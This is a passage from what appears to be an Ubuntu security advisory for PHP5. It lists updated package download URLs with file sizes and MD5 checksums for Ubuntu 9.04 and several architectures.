a6c4617e3126c6763bb1f59ef8e7c88a\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pspell_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 11162 c2dd4211a8c6001992322bbb54ca599c\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-recode_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 7188 ecdc26981751f8aa8784e04edf7e415b\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-snmp_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 14246 7633e5c0a90b0f161757f732580fe0e0\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sqlite_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 42406 4c92b6b1b117f7fc1bd6ba4b021668a8\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sybase_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 31376 15d7aa7a6c371c41208417e71a2e76eb\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-tidy_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 20076 134dad0fdb0d45c4e482204be8a60498\r\n ;http://ports.ubuntu.com/pool/main/p/php5/php5-xmlrpc_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 40504 a0c482b7c753cd56c0ef68bcb6332c63\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-xsl_5.2.4-2ubuntu5.12_powerpc.deb\r\n Size/MD5: 15706 a74422af7965d15c697b7e65d58fabfd\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://ports.ubuntu.com/pool/main/p/php5/libapache2-mod-php5_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 2495284 c9827ccb5a8b026aebba1061c8c506c5\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-cgi_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 4886636 7b8059b5ca5fadc73476c28ba3169f6c\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-cli_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 2464622 72e861a7f64f0816cbeaf1148476f525\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-common_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 317372 cfe9e879b144adac2113c9232db770bc\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-curl_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 24278 516f611a4aa4145a741c0f727d91d989\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-dev_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 364508 6ec06292057caed29ddeb7b931fa63aa\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gd_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 33592 1128a8eb76a4e5c9eca4950aa7c31453\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gmp_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 14154 542954ae8bd8a6a93f224d7e42a81847\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-ldap_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 17698 78ecbaa90118926dfcf9fea9a9275772\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-mhash_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 5062 cfd5a15e67148e0a834b046c092ff2f9\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-mysql_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 63412 82b4091afe904d23c0b09e88d3c33e52\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-odbc_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 32426 5719dad85dce92bccea8d2aaad595e1c\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pgsql_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 49696 e680295043b3d7192d44049ca5f10b22\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pspell_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 8478 9e933d356c40b778e1a5ed395cc622c1\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-recode_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 4742 7f3d3939f9c36aa854a504cc231d23a9\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-snmp_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 11548 02e4a12ceb04e464c9e04b0deb00361e\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sqlite_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 32802 1c3ca62abe448c06dc017401b6ec208b\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sybase_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 24964 c246cb9bce383c8b15021fcc368bcdd8\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-tidy_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 16348 2115ad8f0845668d0b87787dad659202\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-xmlrpc_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 34840 577d5b6c9c05eb49f0126f4a8565cca0\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-xsl_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 12014 c91538ad9e50599a65a35579673d2f93\r\n\r\nUpdated packages for Ubuntu 9.04:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.2.6.dfsg.1-3ubuntu4.6.diff.gz\r\n Size/MD5: 207487 b3e8e3a2ec48b829c4e62dc46fa70199\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.2.6.dfsg.1-3ubuntu4.6.dsc\r\n Size/MD5: 2543 75936383874b8ac06f2a1a7cf135dd41\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.2.6.dfsg.1.orig.tar.gz\r\n Size/MD5: 12173741 b80fcee38363f031229368ceff8ced58\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php-pear_5.2.6.dfsg.1-3ubuntu4.6_all.deb\r\n Size/MD5: 334930 c242105530f666bfc123ca9ab4bdad69\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.2.6.dfsg.1-3ubuntu4.6_all.deb\r\n Size/MD5: 1118 35f7e52a14991cef39b8d6425c91589c\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-3ubuntu4.6_amd64.deb\r\n Size/MD5: 2619026 7bb669673283aacd8443b58e3decd3e7\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.2.6.dfsg.1-3ubuntu4.6_amd64.deb\r\n Size/MD5: 5099592 7ca0aa6df95b40fe268c081fa84bd753\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.2.6.dfsg.1-3ubuntu4.6_amd64.deb\r\n Size/MD5: 2573538 d0492bcd77aab2214e61cce109c574e7\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.2.6.dfsg.1-3ubuntu4.6_amd64.deb\r\n Size/MD5: 374508 9a29826d68a9c418732ab7b53ae060fe\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.2.6.dfsg.1-3ubuntu4.6_amd64.deb\r\n Size/MD5: 25452 d96246f110f37cff8497a46b42d212d6\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dbg_5.2.6.dfsg.1-3ubuntu4.6_amd64.deb\r\n Size/MD5: 8342472 ebc9f5c4a94ac405100888b2e8a852e9\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.2.6.dfsg.1-3ubuntu4.6_amd64.deb\r\n Size/MD5: 366056 d2c1969d438d67c2f090b30644cc0cc1\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.2.6.dfsg.1-3ubuntu4.6_amd64.deb\r\n Size/MD5: 37206 15876803ea7ba54776020c3a8a7c9cb6\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gmp_5.2.6.dfsg.1-3ubuntu4.6_amd64.deb\r\n Size/MD5: 16550 ef07ed149876df6c8a98947f158719a1\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.2.6.dfsg.1-3ubuntu4.6_amd64.deb\r\n Size/MD5: 20324 3073ea3b1dfaa90cae5b14919024a725\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.2.6.dfsg.1-3ubuntu4.6_amd64.deb\r\n Size/MD5: 5630 cdf42bd7074a4555068d70e03a2a71e8\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.2.6.dfsg.1-3ubuntu4.6_amd64.deb\r\n Size/MD5: 74512 9425f06218417d1d1d91bbd16a9173c1\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.2.6.dfsg.1-3ubuntu4.6_amd64.deb\r\n Size/MD5: 38044 0bae290e82d15b8856da662e445a17ea\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.2.6.dfsg.1-3ubuntu4.6_amd64.deb\r\n Size/MD5: 57330 b2dc792f223c64a7ea4790c0d17bb6b6\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pspell_5.2.6.dfsg.1-3ubuntu4.6_amd64.deb\r\n Size/MD5: 9552 c6b8cee98bc0fa9b950db0e7f44f45bc\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.2.6.dfsg.1-3ubuntu4.6_amd64.deb\r\n Size/MD5: 5144 9e661dd5cb46b9bd0724c4e7893089c3\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.2.6.dfsg.1-3ubuntu4.6_amd64.deb\r\n Size/MD5: 12590 d07d6f743e9c493e948f6c45ccc7d661\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.2.6.dfsg.1-3ubuntu4.6_amd64.deb\r\n Size/MD5: 40244 1c8bc0ca1bc8af99211d9b8fd31d9739\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.2.6.dfsg.1-3ubuntu4.6_amd64.deb\r\n Size/MD5: 28538 7fa5a789395d3b99bda2ddae502fd16d\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-tidy_5.2.6.dfsg.1-3ubuntu4.6_amd64.deb\r\n Size/MD5: 18094 9745b335f8f5c5090f8b06d16f01c5de\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-3ubuntu4.6_amd64.deb\r\n Size/MD5: 39552 f58fd70291651ce19058b65d0a0c1cab\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.2.6.dfsg.1-3ubuntu4.6_amd64.deb\r\n Size/MD5: 14008 ba8e6ebb866f26b2bccbd00d88408cf4\r\n http://security.ubuntu.com/ubuntu/pool/universe/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-3ubuntu4.6_amd64.deb\r\n Size/MD5: 2617510 2cb3c02d7079414de40a70d01ff90fc9\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-3ubuntu4.6_i386.deb\r\n Size/MD5: 2484932 fd68aea10fe6b22af0c18300b4566e27\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.2.6.dfsg.1-3ubuntu4.6_i386.deb\r\n Size/MD5: 4940482 c6511ad7c4a06cc263fe4705382c5c29\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.2.6.dfsg.1-3ubuntu4.6_i386.deb\r\n Size/MD5: 2490228 a75132a4381136bb7ffaaf0adb2da2b8\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.2.6.dfsg.1-3ubuntu4.6_i386.deb\r\n Size/MD5: 368390 9d4a3ed51b41546411fb3f62c740c52b\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.2.6.dfsg.1-3ubuntu4.6_i386.deb\r\n Size/MD5: 23928 0d109c304b8ce92d26c7b189ecdfa417\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dbg_5.2.6.dfsg.1-3ubuntu4.6_i386.deb\r\n Size/MD5: 8529360 d88b0b47aa6c8ab37d41448e234893df\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.2.6.dfsg.1-3ubuntu4.6_i386.deb\r\n Size/MD5: 365678 d607031f0ee966ae9a2427cad3d27fe8\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.2.6.dfsg.1-3ubuntu4.6_i386.deb\r\n Size/MD5: 32538 d60a9638c3cc36793372a80945af3d1c\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gmp_5.2.6.dfsg.1-3ubuntu4.6_i386.deb\r\n Size/MD5: 14132 cfef5b3e298b5c9f651efef54dfb9d31\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.2.6.dfsg.1-3ubuntu4.6_i386.deb\r\n Size/MD5: 18342 093e0b048c1a0707c78e6784bd8dbb3d\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.2.6.dfsg.1-3ubuntu4.6_i386.deb\r\n Size/MD5: 5322 37761c8a5f9c7fa7d1fbe8205a5a97e5\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.2.6.dfsg.1-3ubuntu4.6_i386.deb\r\n Size/MD5: 65828 24a56fe163829977ce714c219bdf462a\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.2.6.dfsg.1-3ubuntu4.6_i386.deb\r\n Size/MD5: 34118 ec2db524fb18b14e75a09dc45edf6c9b\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.2.6.dfsg.1-3ubuntu4.6_i386.deb\r\n Size/MD5: 52842 4d9d50cbddce8ad76b2ae2d70b74a16b\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pspell_5.2.6.dfsg.1-3ubuntu4.6_i386.deb\r\n Size/MD5: 8624 aef5cfab9ea9aec763308f1365bb01ce\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.2.6.dfsg.1-3ubuntu4.6_i386.deb\r\n Size/MD5: 4892 3a9917a156e3b8de9a35b7de97bf8803\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.2.6.dfsg.1-3ubuntu4.6_i386.deb\r\n Size/MD5: 11876 af3d9e03fda6fad41fd81783cde600a7\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.2.6.dfsg.1-3ubuntu4.6_i386.deb\r\n Size/MD5: 34630 21a9e8b0bb4a7fe4269303dd8cbb466d\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.2.6.dfsg.1-3ubuntu4.6_i386.deb\r\n Size/MD5: 26278 5f97847e5f31789f306573a564daa281\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-tidy_5.2.6.dfsg.1-3ubuntu4.6_i386.deb\r\n Size/MD5: 16544 5b398170047c06fbf993ba379dfbb220\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-3ubuntu4.6_i386.deb\r\n Size/MD5: 36630 a0e79d48c9795348b86bd65d1d084d82\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.2.6.dfsg.1-3ubuntu4.6_i386.deb\r\n Size/MD5: 12824 b45bb9e9b3c30e257c9ea1d0afce35ae\r\n http://security.ubuntu.com/ubuntu/pool/universe/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-3ubuntu4.6_i386.deb\r\n Size/MD5: 2483698 eed96b7f199394b2e3abdef4500cc9ad\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n http://ports.ubuntu.com/pool/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-3ubuntu4.6_lpia.deb\r\n Size/MD5: 2460302 ca66f460c0ba5121789f0c2facdf2877\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-cgi_5.2.6.dfsg.1-3ubuntu4.6_lpia.deb\r\n Size/MD5: 4891624 00459119e7094b43729dfcb72996dc24\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-cli_5.2.6.dfsg.1-3ubuntu4.6_lpia.deb\r\n Size/MD5: 2466788 04637b6abfc1a5f6d828937fd5da4095\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-common_5.2.6.dfsg.1-3ubuntu4.6_lpia.deb\r\n Size/MD5: 369372 922fb3de22685706d204a26442d3b30d\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-curl_5.2.6.dfsg.1-3ubuntu4.6_lpia.deb\r\n Size/MD5: 23450 046dfa33d5207b787ac69ec949232052\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-dbg_5.2.6.dfsg.1-3ubuntu4.6_lpia.deb\r\n Size/MD5: 8594100 55b34375930340b7080ea4cacac6cebf\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-dev_5.2.6.dfsg.1-3ubuntu4.6_lpia.deb\r\n Size/MD5: 362964 ca531ae80d44ae18a144436033f67921\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gd_5.2.6.dfsg.1-3ubuntu4.6_lpia.deb\r\n Size/MD5: 32308 a9840b87ad105ed907e657da4b14c487\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gmp_5.2.6.dfsg.1-3ubuntu4.6_lpia.deb\r\n Size/MD5: 14180 a569c952b34b3428f4b6845532de5c00\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-ldap_5.2.6.dfsg.1-3ubuntu4.6_lpia.deb\r\n Size/MD5: 18202 be1a700f90db013b195c8773e8e2afa2\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-mhash_5.2.6.dfsg.1-3ubuntu4.6_lpia.deb\r\n Size/MD5: 5168 962aaa77c1e13259168f1142386a63e0\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-mysql_5.2.6.dfsg.1-3ubuntu4.6_lpia.deb\r\n Size/MD5: 64514 1a08a4e85ab0c6e3128b856f1c4e3f89\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-odbc_5.2.6.dfsg.1-3ubuntu4.6_lpia.deb\r\n Size/MD5: 34376 39ace6853155fcab773260b432431e36\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pgsql_5.2.6.dfsg.1-3ubuntu4.6_lpia.deb\r\n Size/MD5: 52128 a29ef3b3d9e35a4cf00e0772a2b28f21\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pspell_5.2.6.dfsg.1-3ubuntu4.6_lpia.deb\r\n Size/MD5: 8556 a83f7933da41022913b8b40286d98cc0\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-recode_5.2.6.dfsg.1-3ubuntu4.6_lpia.deb\r\n Size/MD5: 4828 6062ca506acb290985ef5a4939914bc9\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-snmp_5.2.6.dfsg.1-3ubuntu4.6_lpia.deb\r\n Size/MD5: 11736 0ebc680b704845765e731d52e67756b2\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sqlite_5.2.6.dfsg.1-3ubuntu4.6_lpia.deb\r\n Size/MD5: 34092 01b6397fbe15d68a3ae55cf87b45b7da\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sybase_5.2.6.dfsg.1-3ubuntu4.6_lpia.deb\r\n Size/MD5: 26180 61cdfff15c6e5ba1390a2772e487f9d2\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-tidy_5.2.6.dfsg.1-3ubuntu4.6_lpia.deb\r\n Size/MD5: 16378 33d63bc18d388ccd4e54ef6cd7400608\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-3ubuntu4.6_lpia.deb\r\n Size/MD5: 36062 780fb6aa451fc0f72d3fd58775d47365\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-xsl_5.2.6.dfsg.1-3ubuntu4.6_lpia.deb\r\n Size/MD5: 12706 261647454406a7fefe4b9d5791340b4c\r\n http://ports.ubuntu.com/pool/universe/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-3ubuntu4.6_lpia.deb\r\n Size/MD5: 2459000 2f447f4d5d88a5018c25f953e8cecfda\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://ports.ubuntu.com/pool/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-3ubuntu4.6_powerpc.deb\r\n Size/MD5: 2620686 ae14ab30a99e5d1e448f2fec732baa84\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-cgi_5.2.6.dfsg.1-3ubuntu4.6_powerpc.deb\r\n Size/MD5: 5089864 edc11a7cc50d679cad9913bcb47d660e\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-cli_5.2.6.dfsg.1-3ubuntu4.6_powerpc.deb\r\n Size/MD5: 2567126 97f4b385793f476dde448e7326cdfea0\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-common_5.2.6.dfsg.1-3ubuntu4.6_powerpc.deb\r\n Size/MD5: 376184 eb1b4ad524f03fe92153f82fa39b739f\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-curl_5.2.6.dfsg.1-3ubuntu4.6_powerpc.deb\r\n Size/MD5: 28206 0b2bafad7619b1093f0fd3de332c63a6\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-dbg_5.2.6.dfsg.1-3ubuntu4.6_powerpc.deb\r\n Size/MD5: 9039770 f4e1903dd67b3ba5d8c4dccb367b4c8e\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-dev_5.2.6.dfsg.1-3ubuntu4.6_powerpc.deb\r\n Size/MD5: 362990 8fb8590e88377a76351216e3f9386d60\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gd_5.2.6.dfsg.1-3ubuntu4.6_powerpc.deb\r\n Size/MD5: 38310 166cbc66ac76ef93f2bb95a0400f47f7\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gmp_5.2.6.dfsg.1-3ubuntu4.6_powerpc.deb\r\n Size/MD5: 17000 9cf72875580279ecbcf0f3cbda280789\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-ldap_5.2.6.dfsg.1-3ubuntu4.6_powerpc.deb\r\n Size/MD5: 21762 4cf144716366831f409fb17d0a37e13b\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-mhash_5.2.6.dfsg.1-3ubuntu4.6_powerpc.deb\r\n Size/MD5: 7746 4540bc4b54b3d3ab0701f0e718c25e1e\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-mysql_5.2.6.dfsg.1-3ubuntu4.6_powerpc.deb\r\n Size/MD5: 77172 831dd368370feaf7743724ac03720a87\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-odbc_5.2.6.dfsg.1-3ubuntu4.6_powerpc.deb\r\n Size/MD5: 41588 f88e41cbd7aaec0326675d3ae6ef6869\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pgsql_5.2.6.dfsg.1-3ubuntu4.6_powerpc.deb\r\n Size/MD5: 60742 221810f7e310256d0261914f3408204b\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pspell_5.2.6.dfsg.1-3ubuntu4.6_powerpc.deb\r\n Size/MD5: 11124 f2aa3d98651594379608b5bca3731c91\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-recode_5.2.6.dfsg.1-3ubuntu4.6_powerpc.deb\r\n Size/MD5: 7284 b6f0be43e11d7ec4f62a362986a67ef3\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-snmp_5.2.6.dfsg.1-3ubuntu4.6_powerpc.deb\r\n Size/MD5: 14404 ad082ee64a5053d24da72257c74ba222\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sqlite_5.2.6.dfsg.1-3ubuntu4.6_powerpc.deb\r\n Size/MD5: 42592 c62427fb9ac04f43bbb7440d62befeae\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sybase_5.2.6.dfsg.1-3ubuntu4.6_powerpc.deb\r\n Size/MD5: 31296 3a764047971cdfd522e1aff9240569d2\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-tidy_5.2.6.dfsg.1-3ubuntu4.6_powerpc.deb\r\n Size/MD5: 20008 fad2582f1c5781f067296672e0e3473e\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-3ubuntu4.6_powerpc.deb\r\n Size/MD5: 40844 31bd63d0c077b2ed4e60cbe5d69d155c\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-xsl_5.2.6.dfsg.1-3ubuntu4.6_powerpc.deb\r\n Size/MD5: 16026 840e82405064a1707550daf747993ec5\r\n http://ports.ubuntu.com/pool/universe/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-3ubuntu4.6_powerpc.deb\r\n Size/MD5: 2618436 d536e6ef7e4624dce763188360da1796\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://ports.ubuntu.com/pool/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-3ubuntu4.6_sparc.deb\r\n Size/MD5: 2475450 a5a7f93218e488ccab5cd7b92abd98eb\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-cgi_5.2.6.dfsg.1-3ubuntu4.6_sparc.deb\r\n Size/MD5: 4844326 f8eefd00f3fd6412a2960d57a4d022bb\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-cli_5.2.6.dfsg.1-3ubuntu4.6_sparc.deb\r\n Size/MD5: 2441878 f63a1d4b965e08e42f0657b6e085f4a7\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-common_5.2.6.dfsg.1-3ubuntu4.6_sparc.deb\r\n Size/MD5: 369792 b7a2ecf11293eb28dcf6a1cc9e08db18\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-curl_5.2.6.dfsg.1-3ubuntu4.6_sparc.deb\r\n Size/MD5: 24360 065ad30d2222d3ed763510eee737e9f0\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-dbg_5.2.6.dfsg.1-3ubuntu4.6_sparc.deb\r\n Size/MD5: 8432206 d8bfdb785fc07db3f55c735addf297ce\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-dev_5.2.6.dfsg.1-3ubuntu4.6_sparc.deb\r\n Size/MD5: 362968 f27bae78c575502744e20161f39fb8e8\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gd_5.2.6.dfsg.1-3ubuntu4.6_sparc.deb\r\n Size/MD5: 33098 08c8e3f8cec6a15faef507a9ce13c444\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gmp_5.2.6.dfsg.1-3ubuntu4.6_sparc.deb\r\n Size/MD5: 13296 53175a497a9b24e61d3242127ff4145d\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-ldap_5.2.6.dfsg.1-3ubuntu4.6_sparc.deb\r\n Size/MD5: 17560 360da42810f0879e85138d308dd16033\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-mhash_5.2.6.dfsg.1-3ubuntu4.6_sparc.deb\r\n Size/MD5: 5144 7b2f3b557491c650b858b5186113b6b5\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-mysql_5.2.6.dfsg.1-3ubuntu4.6_sparc.deb\r\n Size/MD5: 63472 73a25ec3d06868218d25fcd84cae9e9f\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-odbc_5.2.6.dfsg.1-3ubuntu4.6_sparc.deb\r\n Size/MD5: 32860 6747e1f3a3c211c5524e43d3672afefe\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pgsql_5.2.6.dfsg.1-3ubuntu4.6_sparc.deb\r\n Size/MD5: 49976 fe7daefb506446a289190efaf3d6fff1\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pspell_5.2.6.dfsg.1-3ubuntu4.6_sparc.deb\r\n Size/MD5: 8360 ec56e4305e9386638c694c3f85c925bc\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-recode_5.2.6.dfsg.1-3ubuntu4.6_sparc.deb\r\n Size/MD5: 4818 3ad15213b502518e8cc6af21cfcef405\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-snmp_5.2.6.dfsg.1-3ubuntu4.6_sparc.deb\r\n Size/MD5: 11702 ecc6c0f38090a0f617172987bd450211\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sqlite_5.2.6.dfsg.1-3ubuntu4.6_sparc.deb\r\n Size/MD5: 32688 8a8fd26805d85946827b670accabccb2\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sybase_5.2.6.dfsg.1-3ubuntu4.6_sparc.deb\r\n Size/MD5: 24906 909997838365999e79fc9c70cf21ece7\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-tidy_5.2.6.dfsg.1-3ubuntu4.6_sparc.deb\r\n Size/MD5: 16494 02bd099e9c91325e9fa3df4e98104fd1\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-3ubuntu4.6_sparc.deb\r\n Size/MD5: 35226 b15b034ec59eb4237be5351e634e9027\r\n 